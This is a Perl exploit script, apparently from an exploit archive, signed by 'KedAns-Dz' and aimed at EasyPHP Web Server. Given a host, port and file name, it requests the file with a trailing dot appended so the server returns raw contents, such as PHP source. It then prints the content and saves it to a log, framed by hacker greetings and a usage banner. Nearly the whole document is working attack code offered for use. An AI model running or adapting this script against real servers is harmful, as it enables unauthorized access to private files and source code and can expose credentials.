#!/usr/bin/perl # ********* In The name of Allah ************ ### # Title : EasyPHP Web Server Remote File Download Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Remote Content/Download File # Tested on : Windows XP SP3 Français # Target : EasyPHP ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # EasyPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug. # The vulnerability allows an unprivileged attacker to download files whom he has no permissions to. # ------------ # ********* In The name of Allah ************ system("title KedAns-Dz"); system("color 1e"); system("cls"); sleep(1); # Start Exploit : ** Allah Akbar ** use LWP::Simple; if (@ARGV < 3) { print("\r\n"); print("=================================================================\r\n"); print(" [*] EasyPHP Web Server Remote File Download Exploit\r\n"); print(" [*] Discovered & Exploited by : KedAns-Dz\r\n"); print("=================================================================\r\n"); print(" [!] Usage: " .$0. " \r\n"); print(" [!] HOST - An host using EasyPHP Web Server\r\n"); print(" [!] PORT - Port number\r\n"); print(" [!] FILE - The file you want to get\r\n"); print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n"); print("=================================================================\r\n\r\n"); sleep(1); exit(1); # ** Allah Akbar ** } else { print("=================================================================\n"); print(" [*] EasyPHP Web Server Remote File Download Exploit\r\n"); print(" [*] Discovered & Exploited by : KedAns-Dz\r\n"); print("=================================================================\r\n\r\n"); sleep(2); ($host, $port, $file) = @ARGV; $content = get("http://" .$host. ":" .$port. "/" .$file. "."); print(" [+] File Content:\r\n\r\n"); sleep(2); print($content. "\r\n"); open (KDZ ,">","KedAns.log"); print KDZ "Log File Exploited By KedAns-Dz \r\n" . "Greets All Hackers Moslems & All My Friends \r\n" . "Target : http://$host:$port/$file \r\n" . "File Content : \n\n" . "=============================\r\n\n" . "$content"; print("\r\n"); print("=================================================================\n"); print "\n[+++] Creating And Download the Target File Content in KedAns.log \n"; } # ** In The Peace of Allah ** #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================